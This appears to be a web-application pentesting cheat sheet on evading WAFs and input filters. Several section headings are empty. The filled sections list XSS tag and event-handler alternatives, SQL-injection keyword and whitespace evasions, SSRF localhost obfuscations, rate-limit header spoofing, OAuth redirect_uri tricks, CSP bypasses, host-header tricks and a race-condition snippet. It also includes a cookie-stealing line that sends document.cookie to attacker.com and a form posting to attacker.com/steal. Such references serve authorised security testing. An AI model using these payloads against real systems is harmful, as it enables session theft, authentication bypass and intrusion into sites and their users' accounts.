Bypasses¶
WAF evasion, filter bypass, and encoding tricks.
URL Encoding¶
Double URL Encoding¶
Unicode Encoding¶
HTML Entities¶
Overlong UTF-8¶
Case Manipulation¶
Space Alternatives¶
%09 (tab) %0a (newline)
%0d (CR) %0c (form feed)
%20 (space) + (URL space)
/**/ (SQL/JS) / (in tags: <svg/onload>)
Null Bytes¶
Newline Injection¶
IP Obfuscation¶
127.0.0.1 = 2130706433 (decimal)
127.0.0.1 = 0x7f000001 (hex)
127.0.0.1 = 0177.0.0.1 (octal)
127.0.0.1 = 127.1 (short)
127.0.0.1 = [::1] (IPv6)
127.0.0.1 = [::ffff:127.0.0.1]
Unicode/Homograph¶
Path Traversal Bypass¶
XSS Filter Bypass¶
Tag Alternatives¶
<script> blocked? Try:
<svg onload=...>
<img src=x onerror=...>
<body onload=...>
<input onfocus=... autofocus>
<details open ontoggle=...>
<marquee onstart=...>
<video><source onerror=...>
<iframe srcdoc="<script>...">
Event Handler Alternatives¶
onclick ondblclick
onmouseover onmouseenter
onfocus onblur
onerror onload
onanimationend ontransitionend
onbegin onpageshow
Without Parentheses¶
Keyword Splitting¶
SQLi Filter Bypass¶
Comment Injection¶
Keyword Bypass¶
UNION β UN/**/ION β /*!UNION*/
SELECT β /*!50000SELECT*/
AND β && β %26%26
OR β || β %7c%7c
Whitespace Bypass¶
SELECT%09username%09FROM%09users
SELECT%0ausername%0aFROM%0ausers
SELECT/**/username/**/FROM/**/users
SSRF Filter Bypass¶
Localhost Bypass¶
URL Parser Confusion¶
http://evil.com@127.0.0.1/
http://127.0.0.1@evil.com/
http://127.0.0.1#@evil.com
http://127.0.0.1%00@evil.com
DNS Rebinding¶
Rate Limit Bypass¶
IP Header Spoofing¶
X-Forwarded-For: 127.0.0.1
X-Real-IP: 10.0.0.1
X-Originating-IP: 192.168.1.1
True-Client-IP: 172.16.0.1
X-Client-IP: 1.2.3.4
CF-Connecting-IP: 5.6.7.8
X-Remote-IP: 9.10.11.12
X-Remote-Addr: 13.14.15.16
Session/Endpoint Rotation¶
# Different session per request
# Different casing: /api/user vs /API/USER
# Add trailing: /api/user/
# Add params: /api/user?x=1
Auth Bypass¶
Response Manipulation¶
{"success": false} β {"success": true}
{"2fa_required": true} β delete field
HTTP/1.1 401 β HTTP/1.1 200
Parameter Pollution¶
Null/Blank Values¶
OAuth/Redirect Bypass¶
redirect_uri=https://evil.com
redirect_uri=https://legit.com/callback/../../../evil
redirect_uri=https://legit.com@evil.com
redirect_uri=https://legit.com%00.evil.com
redirect_uri=https://lΠ΅git.com (Cyrillic Π΅)
CSP Bypass¶
Missing Directives¶
<!-- No object-src -->
<object data="javascript:alert(1)">
<!-- No base-uri -->
<base href="https://attacker.com/">
<!-- No form-action -->
<form action="https://attacker.com/steal">
Exfiltration¶
<!-- Via img (usually allowed) -->
<img src="https://attacker.com/?c="+document.cookie>
<!-- Via DNS prefetch -->
<link rel="dns-prefetch" href="//data.attacker.com">
HTTP Method Override¶
Host Header Tricks¶
Host: evil.com
Host: target.com@evil.com
Host: target.com%00.evil.com
X-Forwarded-Host: evil.com
X-Host: evil.com
Content-Type Tricks¶
application/json β application/x-www-form-urlencoded
application/xml β text/xml
multipart/form-data β application/json
WAF-Specific¶
Cloudflare¶
Akamai¶
ModSecurity¶
Race Condition Bypass (2FA/Rate Limit)¶
# HTTP/2 single-packet
# Turbo Intruder with gate
for i in range(50):
engine.queue(target.req, gate='race1')
engine.openGate('race1')
Test Systematically
Understand what's blocked, then find the specific bypass. Don't random spray.
Combine techniques: encoding + case + comments often works together.